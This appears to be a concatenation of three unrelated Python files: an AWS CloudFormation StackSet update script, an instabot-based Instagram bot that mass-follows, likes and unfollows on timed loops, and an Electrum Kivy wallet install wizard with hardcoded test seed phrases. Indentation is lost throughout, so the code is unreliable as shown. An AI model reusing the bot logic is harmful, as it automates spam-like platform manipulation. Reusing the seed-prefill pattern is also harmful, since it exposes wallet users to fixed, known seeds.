print(f"Cannot add stacks to stackset {stackset}. Current stackset status is : {response['StackSet']['Status']} [{Status.FAIL.value}]")
return Execution.FAIL
print("in progress ", end="")
with Spinner():
filter=[{
'Name': 'DETAILED_STATUS',
'Values': 'PENDING'
}]
response = client.list_stack_instances(StackSetName=stackset,Filters=filter)
while(len(response['Summaries']) > 0):
time.sleep(1)
response = client.list_stack_instances(StackSetName=stackset,Filters=filter)
try:
operationPreferences={
'RegionConcurrencyType': 'PARALLEL',
'FailureToleranceCount': 9,
'MaxConcurrentCount': 10,
}
client.create_stack_instances(
StackSetName=stackset,
Regions=regions,
Accounts=accounts,
OperationPreferences=operationPreferences
)
time.sleep(10)
response = client.list_stack_set_operations(StackSetName=stackset)
while(any(x['Status'] == "RUNNING" for x in response['Summaries'])):
time.sleep(2)
response = client.list_stack_set_operations(StackSetName=stackset)
print(f"\033[2K\033[1GAdding stacks to StackSet {stackset} [{Status.OK.value}]")
return Execution.OK
except ClientError as err:
print(f"\033[2K\033[1GAdding stacks to StackSet {stackset} failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
def update_stackset(client, stackset, templates, params=[]):
"""
Function that updates a stackset defined in the parameters
:stackset: The stackset name
    :templates: dict holding the CloudFormation template details
    :params: parameters to be passed to the stackset
    :return: Execution status
"""
global all_regions_except_ireland
global tags
template = templates[stackset]['Template']
capabilities=[]
print(f"StackSet {stackset} update ", end="")
try:
with open(template, "r") as f:
template_body=f.read()
response = client.describe_stack_set(StackSetName=stackset)
except FileNotFoundError as err:
print(f"\033[2K\033[StackSet template file not found : {err.strerror} [{Status.FAIL.value}]")
return Execution.FAIL
except ClientError as err:
print(f"\033[2K\033[1GStackSet {stackset} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
if 'Parameters:' in template_body:
if not null_empty(templates[stackset], 'Params'):
try:
with open(templates[stackset]['Params']) as f:
params = json.load(f)
except FileNotFoundError as err:
print(f"\033[2K\033[1GParameter file not found : {err.strerror} [{Status.FAIL.value}]")
                return Execution.FAIL
except json.decoder.JSONDecodeError as err:
print(f"\033[2K\033[1GParameter file problem : {err.strerror} [{Status.FAIL.value}]")
                return Execution.FAIL
elif not null_empty(response['StackSet'], 'Parameters'):
params = merge_params(response['StackSet']['Parameters'], params)
if not null_empty(response['StackSet'], 'Capabilities'):
capabilities = response['StackSet']['Capabilities']
    apply_tags = tags
    if not null_empty(response['StackSet'], 'Tags'):
        apply_tags = merge_tags(response['StackSet']['Tags'], tags)
    if response['StackSet']['Status'] != 'ACTIVE':
print(f"Cannot update stackset {stackset}. Current status is : {response['StackSet']['Status']} [{Status.FAIL.value}]")
return Execution.FAIL
print("in progress ", end="")
with Spinner():
try:
operationPreferences={
'RegionConcurrencyType': 'PARALLEL',
'FailureToleranceCount': 9,
'MaxConcurrentCount': 10,
}
client.update_stack_set(
StackSetName=stackset,
TemplateBody=template_body,
Parameters=validate_params(params, template_body),
Capabilities=capabilities,
OperationPreferences=operationPreferences,
Tags=apply_tags
)
updated=False
while updated == False:
try:
time.sleep(1)
response = client.describe_stack_set(StackSetName=stackset)
if 'ACTIVE' in response['StackSet']['Status'] :
print(f"\033[2K\033[1GStackSet {stackset} update [{Status.OK.value}]")
updated=True
break
except ClientError as err:
if err.response['Error']['Code'] == 'ThrottlingException':
continue
else:
raise err
return Execution.OK
except ClientError as err:
if err.response['Error']['Code'] == 'AmazonCloudFormationException':
print(f"\033[2K\033[1GStackSet {stackset} not found : {err.response['Error']['Message']} [{Status.FAIL.value}]")
elif err.response['Error']['Code'] == 'ValidationError' and err.response['Error']['Message'] == 'No updates are to be performed.':
print(f"\033[2K\033[1GStackSet {stackset} update [{Status.NO_ACTION.value}]")
return Execution.NO_ACTION
else:
print(f"\033[2K\033[1GStackSet {stackset} update failed. Reason : {err.response['Error']['Message']} [{Status.FAIL.value}]")
return Execution.FAIL
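# Execution reports the outcome of each update step; Status holds the coloured labels printed to the console.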
class Execution(Enum):
FAIL = -1
OK = 0
NO_ACTION = 2
class Status(Enum):
FAIL = Fore.RED + "FAIL" + Style.RESET_ALL
OK = Fore.GREEN + "OK" + Style.RESET_ALL
NO_ACTION = Fore.YELLOW + "NO ACTION" + Style.RESET_ALL
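# Stream wrapper that flushes after every write so progress output appears immediately.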
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
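# Console spinner displayed while long-running AWS operations are in progress (used as a context manager).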
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '⠄⠆⠇⠋⠙⠸⠰⠠⠰⠸⠙⠋⠇⠆': yield cursor
def __init__(self, delay=None):
cursor.hide()
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
cursor.show()
if exception is not None:
return False
if __name__ == "__main__":
main(sys.argv[1:])
|
run.py
|
import multiprocessing as mp
from random import choice
from threading import Thread
from time import strftime, sleep
from instabot import Bot
class Start():
def __init__(self, username, password):
self.user_name = username
self.pass_word = password
self.max_follows_per_day = 750
self.bot = Bot(
followed_file='followed/%s_followed.txt' % (username),
whitelist_file='whitelist/%s_whitelist.txt' % (username),
unfollowed_file='unfollowed/%s_unfollowed.txt' % (username),
skipped_file='skipped/%s_skipped.txt' % (username),
max_follows_per_day=self.max_follows_per_day,
max_unfollows_per_day=self.max_follows_per_day,
max_likes_per_day=self.max_follows_per_day / 2,
follow_delay=100,
unfollow_delay=100,
like_delay=500,
comment_delay=350)
self.hashtag_file = self.bot.read_list_from_file('hashtag.txt')
self.recommendations = False
self.users_file = self.bot.read_list_from_file('user.txt')
loggedIn = self.log_in()
if not loggedIn:
raise Exception('Wrong credentials - please check your username and password')
self.run_bot_process()
while True:
sleep(3600)
def run_bot_process(self):
self.run(self.stats)
self.run(self.followUsersFollowers)
self.run(self.likeHashtagMedias)
self.run(self.unfollow_everyday)
def log_in(self):
return self.bot.login(username=self.user_name, password=self.pass_word,
cookie_fname='cookie/%s_cookie.txt' % (self.user_name), use_cookie=False)
@staticmethod
def run(job_fn):
job_thread = Thread(target=job_fn)
job_thread.start()
def stats(self):
while True:
self.bot.save_user_stats(self.user_name, path='stats/')
sleep(6 * 60 * 60)
self.sleepDuringNight()
def followUsersFollowers(self):
thereIsNoError = True
while thereIsNoError:
self.sleepDuringNight()
try:
usersList = self.getRandomUserFollowers()
for user in usersList:
self.bot.follow(user_id=user)
except Exception as exception:
print(exception)
sleep(3600)
def likeHashtagMedias(self):
thereIsNoError = True
numberOfTimesFailed = 0
while thereIsNoError:
self.sleepDuringNight()
try:
hashtag = choice(self.hashtag_file)
hashtagMedias = self.bot.get_hashtag_medias(hashtag)
self.likeMedias(hashtagMedias)
except Exception as exception:
sleep(3600)
print(exception)
numberOfTimesFailed = numberOfTimesFailed + 1
if numberOfTimesFailed >= 5:
break
def likeMedias(self, hashtagMedias):
for media in hashtagMedias:
self.bot.like(media, check_media=False)
def getRandomUserFollowers(self):
randomUser = choice(self.users_file)
if self.recommendations:
userFollowers = self.bot.get_user_followers(
user_id=randomUser, nfollows=1000)
else:
userFollowers = self.bot.get_user_followers(
user_id=randomUser, nfollows=60)
return userFollowers
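    # Pause activity during the nightly quiet window (between 01:00 and 05:00 local time).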
def sleepDuringNight(self):
currentHour = int(strftime("%H"))
print(currentHour)
sleepFrom = 1
sleepUntil = 5
if sleepFrom <= currentHour <= sleepUntil:
            # sleep until the end of the quiet window
            sleepTimeInHours = sleepUntil - currentHour
sleepTimeInSeconds = sleepTimeInHours * 3600
print('sleeping for %s seconds' % (sleepTimeInSeconds))
sleep(sleepTimeInSeconds)
else:
            print('time for sleeping has not yet been met')
def unfollow_everyday(self):
while True:
self.bot.unfollow_everyone()
sleep(3600 * 10)
if __name__ == '__main__':
mp.get_context('spawn')
q = mp.Queue()
print('input username: ')
username = input()
print('input password: ')
password = input()
mp.Process(target=Start, args=([username, password])).start()
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
Widget
size_hint: 1, 1
Label:
id: backup_warning_label
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
opacity: int(m.value != n.value)
text: _("Warning: to be able to restore a multisig wallet, " \
"you should include the master public key for each cosigner " \
"in all of your backups.")
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<SeedDialogHeader@GridLayout>
text: ''
options_dialog: None
rows: 1
orientation: 'horizontal'
size_hint: 1, None
height: self.minimum_height
BigLabel:
size_hint: 9, None
text: root.text
IconButton:
id: options_button
height: '30dp'
width: '30dp'
size_hint: 1, None
icon: 'atlas://electrum/gui/kivy/theming/light/gear'
on_release:
root.options_dialog() if root.options_dialog else None
<RestoreSeedDialog>
message: ''
word: ''
SeedDialogHeader:
id: seed_dialog_header
text: 'ENTER YOUR SEED PHRASE'
options_dialog: root.options_dialog
GridLayout:
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
SeedDialogHeader:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
options_dialog: root.options_dialog
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '48dp'
SeedLabel:
text: root.warning
<ChoiceLineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
SeedLabel:
text: root.message2
TextInput:
id: text_input
multiline: False
size_hint: 1, None
height: '48dp'
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
self.auto_dismiss = False
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
self._trigger_size_dialog = Clock.create_trigger(self._size_dialog)
# note: everything bound here needs to be unbound as otherwise the
# objects will be kept around and keep receiving the callbacks
Window.bind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
self._trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_keyboard(self, instance, key, keycode, codepoint, modifier):
if key == 27:
if self.wizard.can_go_back():
self.wizard.go_back()
else:
app = App.get_running_app()
if not app.is_exit:
app.is_exit = True
app.show_info(_('Press again to exit'))
else:
self._on_release = False
self.dismiss()
return True
def on_dismiss(self):
Window.unbind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None, None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.title = kwargs.get('message', '')
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
self.init_choices(choices)
def init_choices(self, choices):
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message = kwargs.get('message', '')
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class CLButton(ToggleButton):
def on_release(self):
self.root.script_type = self.script_type
self.root.set_text(self.value)
class ChoiceLineDialog(WizardChoiceDialog):
title = StringProperty('')
message1 = StringProperty('')
message2 = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message1 = kwargs.get('message1', '')
self.message2 = kwargs.get('message2', '')
self.choices = kwargs.get('choices', [])
default_choice_idx = kwargs.get('default_choice_idx', 0)
self.ids.next.disabled = False
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for idx, (script_type, title, text) in enumerate(self.choices):
b = CLButton(text=title, height='30dp', group=self.title, allow_no_selection=False)
b.script_type = script_type
b.root = self
b.value = text
layout.add_widget(b)
if idx == default_choice_idx:
b.trigger_action(duration=0)
def set_text(self, value):
self.ids.text_input.text = value
def get_params(self, b):
return (self.ids.text_input.text, self.script_type)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, _):
self.ext = ext
d = SeedOptionsDialog(self.ext, None, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import wordlist as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
self.bip39 = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, bip39):
self.ext = ext
self.bip39 = bip39
self.update_next_button()
d = SeedOptionsDialog(self.ext, self.bip39, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def update_next_button(self):
self.ids.next.disabled = False if self.bip39 else not bool(self._test(self.get_text()))
def on_text(self, dt):
self.update_next_button()
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), self.bip39, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def __init__(self, *args, **kwargs):
RestoreSeedDialog.__init__(self, *args, **kwargs)
self.ids.seed_dialog_header.ids.options_button.disabled = True
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, storage, db):
"""overriden by main_window"""
pass
